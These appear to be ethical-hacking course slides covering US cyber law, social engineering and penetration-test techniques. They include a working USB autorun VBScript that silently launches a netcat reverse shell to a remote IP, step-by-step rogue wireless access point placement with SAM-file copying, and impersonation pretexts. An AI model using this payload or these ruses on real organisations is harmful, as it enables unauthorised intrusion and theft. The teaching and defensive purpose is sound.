Unit I
Unit I
• This phase is where an attacker breaks into the system/network using various tools
or methods.
• After entering into a system, he has to increase his privilege to administrator level
so he can install an application he needs or modify data or hide data.
4. Maintaining Access:
• Hacker may just hack the system to show it was vulnerable or he can be so
mischievous that he wants to maintain or persist the connection in the background
without the knowledge of the user.
• This can be done using Trojans, Rootkits or other malicious files. The aim is to
maintain the access to the target until he finishes the tasks he planned to
accomplish in that target.
5. Clearing Track:
• In one case, a person in Minnesota was caught and punished for releasing a version
of Blaster that infected 7,000 computers and attempted to attack Microsoft.
• These infected computers were turned into bots without their owners knowing.
• Officials like the Attorney General and FBI have stressed how serious these crimes
are, calling them dangerous and costly. Despite efforts, many hackers are never
caught, so improving software security from the start is a better long-term solution.
Disgruntled Employees
• Companies often escort fired employees out quickly and cut off their computer access right
away—not because all employees are bad, but to protect the company from potential harm.
• Some former workers, especially those in IT, have used their insider knowledge to damage
systems or steal data out of revenge.
• Cases under the Computer Fraud and Abuse Act (CFAA) show how ex-employees have
hacked into systems, deleted important data, or stolen money.
• Since it’s hard to calculate financial losses or win court cases, businesses take strict security
steps when someone leaves. Having clear termination procedures helps companies stay safe
from such insider threats.
Other Areas for the CFAA
• The Lori Drew case showed that using fake accounts or breaking website rules may not
always count as a crime under the Computer Fraud and Abuse Act (CFAA), especially if
it’s just a terms-of-service violation.
• Drew created a fake MySpace profile that led to cyberbullying and a teenager's suicide,
but the judge ruled it wasn’t computer fraud.
• On the other hand, in the first major VoIP(Voice over Internet Protocol) hacking case,
Edwin Pena illegally rerouted over 500,000 internet phone calls and sold them for profit,
causing $1.4 million in losses.
• He was caught after a long search and pleaded guilty. These cases show how courts are still
figuring out how the CFAA applies to new technology and online behavior.
State Law Alternatives
• The Computer Fraud and Abuse Act (CFAA) allows both criminal and civil cases if
someone illegally damages a computer system, but victims must prove at least $5,000 in
damages in many cases.
• In such situations, state laws like trespass or theft laws may offer another way to take
legal action, though these laws vary from state to state.
• For example, eBay used state trespass laws to stop automated data scraping that wasn’t
clearly damaging under CFAA. To strengthen a case, companies should track costs and
employee time spent fixing the damage, as these help prove harm in court.
18 USC Sections 2510, et. Seq., and 2701, et. Seq., of the
Electronic Communication Privacy Act
• The Electronic Communication Privacy Act (ECPA) protects communications
from being accessed without permission and is made up of two parts:
• the Wiretap Act, which protects messages while they’re being transmitted, and
• the Stored Communications Act, which protects stored messages.
• A key legal debate is around what counts as an “interception”—usually, courts
say it only applies while data is actively moving, not while it’s stored.
• The ECPA allows some authorized access, like by the government, if proper
legal steps are followed.
• An example of controversy under this law is the Google Buzz case, where users
sued Google for accessing Gmail contacts without permission to create public
follower lists. This shows how businesses must clearly define what access is
authorized to avoid breaking privacy laws
Interesting Application of ECPA
• Websites use small text files called cookies to track users' browsing and shopping habits,
allowing them to personalize what they show you based on your past activity.
• Sometimes, this data is shared between websites, leading to targeted ads and
recommendations.
• Some users felt this violated privacy laws like the Stored Communications Act and the
Wiretap Law, arguing that cookies accessed their personal data or intercepted
communications.
• However, under the ECPA, if one party (like a website) consents to the data collection,
it’s legal.
• Since websites gave permission to share data, the cookie tracking was allowed and
continues to be widely used today.
Trigger Effects of Internet Crime
• The Internet has revolutionized access to information, benefiting individuals,
businesses, and governments, but it has also created opportunities for malicious
actors to exploit this openness.
• After the 9/11 attacks, government agencies, citing national security concerns, began
limiting public access to sensitive data that was once readily available online.
• This shift sparked criticism, with many arguing that such secrecy often extends
beyond legitimate security needs and affects public transparency.
• Laws like the USA Patriot Act expanded surveillance powers and reduced restrictions
on electronic monitoring, reflecting the growing tension between information
freedom and national security.
Digital Millennium Copyright Act (DMCA)
1. Purpose of the DMCA
• Passed in 1998 to enforce the WIPO Copyright Treaty, the DMCA aims to protect copyrighted works from unauthorized access or use by making it illegal to
bypass technological protection mechanisms (like encryption or DRM).
• It applies even if the underlying work is not used—simply breaking the access control itself is a violation.
2. Anti-Circumvention Provisions
• It is illegal to create, use, or distribute tools or services designed to circumvent access controls on copyrighted content (e.g., encrypted e-books, software,
DVDs).
• Example: Even if you don’t copy or share the content, simply bypassing a password or encryption without permission can lead to prosecution.
3. Impact on Ethical Hacking and Research
• The DMCA has limited exemptions for encryption research and security testing, but these are narrow and don’t cover many common ethical hacking
activities.
• This creates a legal gray area for professionals performing penetration testing, reverse engineering, or teaching hacking skills—even for defensive purposes.
• 4. Real-World Cases
• Few criminal cases have been prosecuted under DMCA, but notable ones include:
• U.S. vs. Rocci – Sold mod chips that let game consoles run pirated games.
• There have been efforts to reform or soften the DMCA, but some legislation like the Intellectual Property Protection Act and PRO-IP Act of
2008 further strengthened enforcement rather than weakening it.
4. Real-World Cases
• Few criminal cases have been prosecuted under DMCA, but notable ones
include:
• U.S. vs. Kwak – Paid hackers to break satellite TV encryption.
• U.S. vs. Sklyarov – Created software to bypass e-book copy protection.
• U.S. vs. Rocci – Sold mod chips that let game consoles run pirated games.
5. Controversy and Push for Reform
• Critics argue that the DMCA limits legitimate research and innovation,
especially in cybersecurity.
• There have been efforts to reform or soften the DMCA, but some legislation
like the Intellectual Property Protection Act and PRO-IP Act of 2008 further
strengthened enforcement rather than weakening it.
Cyber Security Enhancement Act of 2002
1 . Stricter Penalties for Dangerous Cybercrimes
• The CSEA allows life imprisonment for cybercrimes that result in or could potentially cause bodily harm, death, or
threats to public safety.
• For example, hacking into systems controlling hospitals, emergency services, traffic lights, or aircraft could lead to
catastrophic outcomes—and severe legal consequences.
2. Support for National Security and the Patriot Act
• The CSEA was introduced to strengthen the Patriot Act, giving the government more power to monitor and respond
to cybersecurity threats.
• It enhances information sharing between private service providers and law enforcement.
3. Legal Protection for Service Providers
• Internet service providers and tech companies can now report suspicious user activity to law enforcement without
notifying the customer or facing lawsuits.
• This removes legal risk for companies cooperating with investigations.
4. Privacy and Civil Liberties Concerns
• Reports made by providers are exempt from the Freedom of Information Act (FOIA), so users cannot request details
about what data was shared or who reported them.
• Civil rights advocates argue this undermines user privacy and accountability, raising concerns about abuse and
overreach.
Securely Protect Yourself Against Cyber Trespass Act (SPY Act)
1. Purpose and Provisions
• The SPY Act aimed to combat spyware by making it illegal to perform activities
such as installing software without consent, modifying internet settings, collecting
personal data through keystroke logging, misleading users about software
functions, or disabling antivirus tools.
2. Transparency Requirement
• The bill required companies to inform users whenever their personal information
was being collected, promoting user awareness and privacy.
3. Criticism and Opposition
• Critics argued the bill lacked enforcement power, didn’t provide new resources to
law enforcement, and would weaken stricter state laws. It also risked preventing
private entities from aiding the federal government in cybersecurity efforts.
• 4. Concerns About Corporate Loopholes
• There was fear that the law could legally allow hardware and software companies
to monitor users, using spyware-like methods, under the protection of the act.
Social Engineering Attacks
• Social engineering is the psychological manipulation of people in the hopes of
gaining access to confidential information or systems. It is a form of confidence trick
for the purpose of information gathering, fraud, or system access.
• The attacks used in social engineering can be used to steal employees' confidential
information or data, and the most common type of social engineering happens over
either phone or email.
• Other examples of social engineering attacks include criminals posing as service
workers or technicians, so they go unnoticed when access the physical site of a
business.
How a Social Engineering Attack Works
• Social engineering attacks, like phishing, trick victims into revealing sensitive
information by mimicking trusted sources through convincing emails and websites.
• As users become more aware, attackers make these schemes more sophisticated and
company-specific, often targeting employees with fake internal login pages. These
attacks remain common because they are simple to execute and frequently successful.
• Social engineering attacks exploit human emotions—such as fear, curiosity, urgency,
or trust—to trick users into bypassing security protocols, often by presenting
scenarios that seem legitimate or demand immediate action.
• Commonly exploited simple emotions, and an example of how each is exploited,
include:
• Greed: is exploited by offering a valuable reward
• Lust: by enticing with provocative content
• Empathy: by impersonating someone in need of help
• Curiosity by presenting irresistible information
• Vanity by appealing to personal ego with flattery or photos.
• Social engineering attacks often begin by triggering simple emotions like curiosity or
vanity to trick users into actions that seem harmless—like clicking a link or logging in—
but actually lead to malware installation or data theft.
• More advanced attackers exploit complex emotions or professional trust to manipulate
people in specific roles, such as convincing a secretary to share internal documents or a
tech support agent to reset credentials, making the attack more subtle and dangerous.
• Attacks of this nature generally attempt to exploit more complex aspects of human
behavior, such as
• A desire to be helpful:“If you’re not busy, would you please copy this file from this CD to
this USB flash drive for me?” Most of us are taught from an early age to be friendly and
helpful. We take this attitude with us to the workplace.
• Authority/conflict avoidance:“If you don’t let me use the conference room to e-mail this
report to Mr. Smith, it’ll cost the company a lot of money and you your job.” If the social
engineer looks authoritative and unapproachable, the target usually takes the easy way out
by doing what’s asked of them and avoiding a conflict.
• Social proof : “Hey look, my company has a Facebook group and a lot of people I know
have joined.” If others are doing it, people feel more comfortable doing something they
wouldn’t normally do alone.
• Regardless of the emotion used, the goal of the attacker is always to trick the victim into taking
an action—like clicking a link or running a program—without realizing the risk or the attacker’s
true intent. Since victims are often inside the target company’s network, getting them to
unknowingly allow remote access can quickly give attackers direct entry to sensitive company
data.
• Conducting a Social Engineering Attack:
• Social engineering attacks (SEAs) must be clearly discussed with the client before being
included in a penetration test, as they involve manipulating employees and can cause emotional
distress if not handled properly.
• These attacks often begin with reconnaissance—gathering information from public sources like
Google, LinkedIn, and social media to identify targets and internal structures.
• Attackers build trust through pretexts (fake scenarios), such as pretending to be a consultant, and
gradually escalate access by exploiting this trust.
• Tactics may include spoofing caller ID, resetting passwords, or gaining access to internal
directories. These exercises often require a team with strong interpersonal, communication, and
hacking skills.
• As attacks become more advanced, the use of fake websites, email accounts, and even face-to-
face impersonations may be necessary to appear legitimate and successfully breach the
organization.
Common Attacks Used in Penetration Testing
• It emphasizes that these attacks aren't guaranteed to work in every situation, since every
target environment is different. Success often depends on specific conditions being in place
—something that might not work one day could be effective the next, and vice versa.
• The previous section gave hypothetical examples meant to help the reader start thinking
like a social engineer and to provide ideas for where to begin.
• Now, the text will present real examples of social engineering tactics that have worked
multiple times in the field.
• These examples focus specifically on the social engineering component of broader
penetration tests.
The Good Samaritan
• The goal of this attack is to gain remote access to a computer on the company network.
• This attack combines SEA techniques with traditional hacking tools. The basic premise is that a
specially prepared USB drive is presented to the target company’s front desk or most publicly
accessible reception area. A very honest-looking person in appropriate attire—a business suit if it’s an
office, for example—hands the employee at the front desk the USB drive, claiming to have found it on
the ground outside.
• The USB drive should look used, have the company name on it, and be labeled with, for example,
“HR Benefits” and the current year.
• What you write on the label of the key is up to you. You’re trying to bait an employee to plug it into a
computer, something they may know they shouldn’t do, so the reward must seem greater than the risk
of violating policy.
• When the USB drive is plugged in, it attempts to install and run a remote access Trojan and pass a
command prompt out to your team across the public Internet. Obviously, what you have the key run is
completely up to you. In this example, we’ll focus on a very simple remote command prompt.
• Putting this attack together is fairly academic in so far as the main work is in the preparation of the
USB drive. The delivery is trivial and can be attempted multiple times and at multiple target locations.
For this attack to work, the target environment must allow the use of USB drives and must have
autorun enabled
• Preparing the USB drive to autorun your payload is a fairly straightforward process as well.
For this example, you’ll need
• A USB drive; in this example, we’ll use an inexpensive SanDisk Cruzer Micro drive.
• A tool to edit an ISO image file; in this example, we’ll use ISO Commander.
• A tool from the manufacturer to write the new ISO image to the drive; in this example,
we’ll use the SanDisk U3 Launchpad, LPInstaller.exe.
• A remote access Trojan; in this example, we’ll simply use a Windows version of netcat.
• In this example, we’re going to use a 1GB SanDisk Cruzer Micro with U3 model.
• Start by downloading the Launchpad Installer application, LPInstaller.exe, from the SanDisk
website.
• You’ll find it under the Support section by using the Find Answers search box.
• This application will download the default U3 ISO image from the SanDisk website and
install it on the flash drive.
• We’re going to trick it into installing an ISO image we’ve modified so that when the USB
drive is plugged into the target machine, it runs code we specify in addition to the U3
Launchpad application.
• Once you have the LPInstaller.exe application downloaded, execute it.
• If you have a personal firewall that operates with a white list, you may have to allow the
application access to the Internet.
• You must be connected to the Internet in order for the application to download the default
ISO image from SanDisk.
• After the application runs, it will require you to plug in a compatible device before it will
allow you to continue. Once it recognizes a compatible device, you can click Next until you
get to the final screen before it writes the image to the flash drive. It should look like this:
• The moment the LPInstaller.exe application detected a compatible flash drive, it began
downloading the default U3 ISO image from the SanDisk website.
• This image is temporarily stored on the user PC in the Application Data section of the
current user’s Documents and Setting directory in a folder called U3. The U3 folder has a
temp folder that contains a unique session folder containing the downloaded ISO file, as
shown here:
•Wait for the ISO file (about 7MB) to fully download through the LPInstaller tool before
making any changes.
•Open the downloaded ISO file (e.g., Pelican-BFG-autorun.iso) using ISO Commander, a
simple ISO editing tool.
•Locate and extract the autorun.inf file from the ISO, then save it to a different location so
you can edit it later with custom commands.
• Extracting the default autorun.inf file is simple Vtype=2
and contains only a few directives. [CopyFiles]
• In this example, we will replace the executable
call with a script of our own. Our script will FileNumber=1
perform an attack using netcat to push a File1=LaunchPad.zip
command shell to a remote computer ,and then
execute the originally specified program, [Update]
LaunchU3.exe, so that the user won’t notice any
abnormal behavior when they plug the USB URL=http://u3.sandisk.com/download/
drive in. The unedited autorun.inf file is as lp_installer.asp?
follows: custom=1.6.1.2&brand=PelicanBFG
[AutoRun] [Comment]
open=wscript LaunchU3.exe -a brand=PelicanBFG
icon=LaunchU3.exe,0 • For our purposes, we’ll only edit the
action=Run U3 Launchpad second line of this file and change it
from
[Definitions]
open=wscript LaunchU3.exe -a
Launchpad=LaunchPad.exe to
open=wscript cruzer/go.vbs
• When the autorun.inf file is executed on insertion of the device, our go.vbs script will
run instead of the LaunchU3.exe application.
• We’ll put it in a directory called cruzer along with the netcat binary nc.exe in an
attempt to make it slightly less noticeable at a casual glance.
• Next we need to create our go.vbs script. Since we’re just demonstrating the technique,
we’ll keep it very simple, as shown next.
• The script will copy the netcat binary to the Windows temp directory and then execute
the netcat command with options to bind a cmd.exe command shell and pass it to a
remote computer
This prevents the script from throwing errors in the event it has trouble
• On Error Resume Next
• set objShell = WScript.CreateObject("WScript.Shell")
• 'Get the location of the temp directory
• temp=objShell.ExpandEnvironmentStrings("%temp%")
• 'Get the location of the Windows Directory
• windir=objShell.ExpandEnvironmentStrings("%windir%")
• set filesys=CreateObject("Scripting.FileSystemObject")
• 'Copy our netcat into the temp directory of the target
• filesys.CopyFile "cruzer\nc.exe", temp & "\"
• 'Wait to make sure the operation completes
• WScript.Sleep 5000
• 'Throw a command prompt to the waiting remote computer, a local test in this case.
• 'The 0 at the end of the line specifies that the command box NOT be displayed to
• 'the user.
• objShell.Run temp & "\nc.exe -e " & windir & "\system32\cmd.exe 192.168.1.106
• 443",0
• 'Execute the application originally specified in the autorun.inf file
• To copy nc.exe (Netcat) to the temp directory, run it to connect back to
an attacker's system via reverse shell, and then launch a decoy
program to avoid user suspicion
• Line-by-line Analysis
• On Error Resume Next
Suppresses all runtime errors. If something fails, the script won't crash or
alert the user.
set objShell = WScript.CreateObject("WScript.Shell")
Creates a shell object, allowing the script to run commands like
cmd.exe.
temp=objShell.ExpandEnvironmentStrings("%temp%")
windir=objShell.ExpandEnvironmentStrings("%windir%")
Gets system environment variables:
%temp%: Path to the Temp folder, e.g., C:\Users\User\AppData\Local\
Temp
%windir%: Windows directory, e.g., C:\Windows
filesys=CreateObject("Scripting.FileSystemObject")
• filesys.CopyFile "cruzer\nc.exe", temp & "\“
• Copies nc.exe from the USB drive (assumed to be mounted under cruzer\)
to the Temp folder
• nc.exe is Netcat
• a networking utility often used for remote control.
• WScript.Sleep 5000
• Waits for 5 seconds (5000 ms) to ensure the file copy completes.
• objShell.Run temp & "\nc.exe -e " & windir & "\system32\cmd.exe
192.168.1.106 443",0
• Launches Netcat, executing cmd.exe and connecting to IP 192.168.1.106
on port 443.
• This is a reverse shell: the victim connects outbound, and the attacker gets
remote terminal access.
• The trailing 0 hides the terminal window from the victim.
• objShell.Run "LaunchU3.exe -a“
• Launches a decoy application (LaunchU3.exe) to make the user think
something legitimate is happening.LaunchU3.exe is associated with U3
smart USB drives, often auto-launched when the drive is plugged in.
• This process outlines how to embed a malicious VBScript (go.vbs) and Netcat (nc.exe)
into a USB drive's ISO image using ISO Commander.
• The script is designed to run silently using VBScript for greater control, leveraging
environment variables to locate system directories like cmd.exe and %temp%.
• After modifying the autorun.inf file and placing all components in the correct directories,
the ISO is saved and written to the flash drive using the LPInstaller tool.
• When the USB is inserted into a target machine, the script automatically runs and
initiates a reverse shell connection to a specified IP for remote access.
• C:\nc -l -p 443
• Port 443 is typically used for secure HTTPS traffic, making it a strategic choice
for attackers because its encrypted nature helps evade firewalls and intrusion
detection systems. In this context, Netcat is used to establish a reverse shell
connection over port 443, blending in with normal encrypted web traffic.
• If successful, the attacker receives a command prompt on their machine, showing
the drive letter assigned to the USB device (U3 file system) on the target machine.
This confirms that the reverse shell has been established and the attacker now has
remote command-line access to the victim’s system.
• The example uses basic tools like Netcat and VBScript to create a
reverse shell (a simple remote access Trojan), more advanced and
stealthy attacks can be developed using similar methods.
• Once familiar with crafting ISO images for USB drives, an attacker
can upgrade the payload—for example, replacing LaunchU3.exe with
a custom Trojan to bypass autorun restrictions.
• Another tactic involves placing a malicious document with an enticing
name on the USB to lure the user into triggering an exploit manually.
Essentially, the flexibility of USB-based attacks makes them limited
only by the attacker’s creativity and technical skill.
The Meeting
• The goal of this attack is to place an unauthorized wireless access point (WAP) on the
corporate network
• This attack requires face-to-face contact with the target. A pretext for a meeting is
required, such as a desire to purchase goods or services on a level that requires a faceto-
• face meeting. Set the meeting time for just after lunch and arrive about 30 to 45 minutes
before your meeting, with the goal of catching your victim away at lunch. Explain
• to the receptionist that you have a meeting scheduled after lunch but were in the area on
other business and decided to come early. Ask whether it is okay to wait for the person to
return from lunch.
• Have an accomplice phone you shortly after you enter the building, act slightly flustered
after you answer your phone, and ask the receptionist if there is some place you can take
your call privately. Most likely you’ll be offered a conference room.
• Once inside the conference room, close the door, find a wall jack, and install your
wireless access point. Have some Velcro or double-sided sticky tape handy to secure it
out of view (behind a piece of furniture, for instance) and a good length of cable to wire it
into the network.
• If you have time, you may also want to clone the MAC address of a computer in the
room and then wire that computer into your access point in the event they’re using port-
level access control. This ruse should provide enough time to set up the access point.
• Be prepared to stay in the room until you receive confirmation from your team that the
access point is working and they have access to the network.
• Once you receive notification that they have access, inform the receptionist that an
emergency has arisen and that you’ll call to reschedule your appointment.
• The beauty of this attack is that it is often successful and usually only exposes one team
member to a single target employee, a receptionist in most cases. It’s low tech and
inexpensive as well.
• In our example, we’re going to use a Linksys Wireless Access Point and configure it for
MAC cloning. For this example, you’ll need
• A Linksys Wireless Access Point
• Double-sided Velcro tape or sticky tape
• A 12-inch or longer CAT5 patch cable
• Get the wireless device ready by sticking double-sided tape to it so you can quickly
hide it later.
• Carry tools like a screwdriver, knife, duct tape, and power adapters in case there are
setup problems.
• Bring a flash drive and a bootable Linux USB or CD like Ubuntu or Knoppix to use
on any computer in the room.
• When you're in the conference room, check if there's a computer, then unplug its
network cable.
• Try to boot the computer using your Linux USB or CD instead of the normal
system.Connect the computer to your wireless device so it gets an internet address
from it.
• Open a browser and go to 192.168.1.1 to access the wireless device's settings.
• Turn on MAC address cloning so the device copies the computer’s ID and avoids
getting blocked by the network.
• After setting up the WAP, save the settings, and if MAC cloning isn’t automatic, use
ifconfig on Linux or ipconfig /all on Windows to find the MAC address.
• Identify the active network interface and manually enter its MAC address into the
WAP settings.
• Plug the WAP into the same wall jack the conference room computer was using, so
the WAP sits between the computer and the network.
• This makes the network think the same computer is still connected, helping avoid
detection due to MAC address matching.
• Be aware that putting the PC behind the WAP may limit network visibility and could
eventually raise suspicion.
• Have a teammate outside the building test if they can connect to the WAP and access
the corporate network.
• While still using the Linux system on the PC, try to copy sensitive files like the SAM
file for later password cracking.
• If the setup works, leave and say you’ll reschedule; if it fails, remove everything to
avoid leaving evidence behind.
Join the Company
• The attacker creates a fake social media profile pretending to work at the target company
and starts connecting with real employees, especially through LinkedIn.
• Once a few employees accept the connection request, others are more likely to accept too,
making the fake profile seem more legitimate.
• The attacker follows posts, group activity, and private messages to gather information about
employees, their roles, and internal company culture.
• Creating a fake group for the company and inviting employees helps the attacker grow their
connections quickly and collect more detailed information.
• By monitoring conversations, the attacker looks for someone who is on vacation or away
from the office, making them a good person to impersonate.
• The attacker chooses someone who looks like a teammate and gathers enough information
to act as if they are that person.
• Using a believable excuse like needing urgent access to the office due to travel or network
issues, the attacker requests temporary access, possibly using a spoofed caller ID.
• With the collected knowledge and a fake ID badge, the attacker gains physical access, using
the trust built online to avoid suspicion and reach the internal network.
Preparing Yourself for Face-to-Face Attacks
• Talking to someone face to face during a social engineering attack is harder than doing it
online because you must react in real time and can't hide behind a screen.
• To be successful, you need to look and act relaxed, just like you’re having a normal
conversation with a friend, even if you feel nervous inside.
• If you look uncomfortable or out of place, people are more likely to notice you and question
your presence.
• Your body may respond to the stress with signs like sweating or a fast heart rate, which can
make you seem suspicious.
• Knowing your resting heart rate and keeping it within a normal range during the encounter
can help you appear calm and confident.
• You can train yourself to stay calm using relaxation techniques like meditation or by
practicing making eye contact with strangers to get used to social pressure.
• Practicing your approach and what you’ll say ahead of time can help you feel more
prepared and reduce nervous mistakes.
• Think about what you’ll carry with you, like a laptop bag or coffee cup, to keep your
hands busy and avoid awkward movements.
• Practice how you stand and where you place your hands in front of a mirror so you
don’t look stiff or nervous.
• Chewing gum or sucking on a mint can help manage nervous swallowing caused by
excess saliva during stressful face-to-face interactions.
Defending Against Social Engineering Attacks
• Social engineering attacks (SEAs) mainly target employees, not systems, so strong defenses
depend more on training than on technology.
• People often make risky decisions without realizing the danger, which makes them vulnerable
to manipulation.
• Many employees don’t take SEAs seriously because they don’t see information as valuable or
feel that such attacks are unlikely.
• Unlike money, which has clear value, data and information can seem less important to protect.
• Awareness training helps employees understand the real risks and the importance of protecting
company data.
• Showing real-world examples of social engineering helps employees see that these threats are
serious and not just theoretical.
• Simulated social engineering attacks should be used regularly to test how well employees are
applying what they’ve learned.
• The results from these tests can improve future training and help make the organization more
secure over time.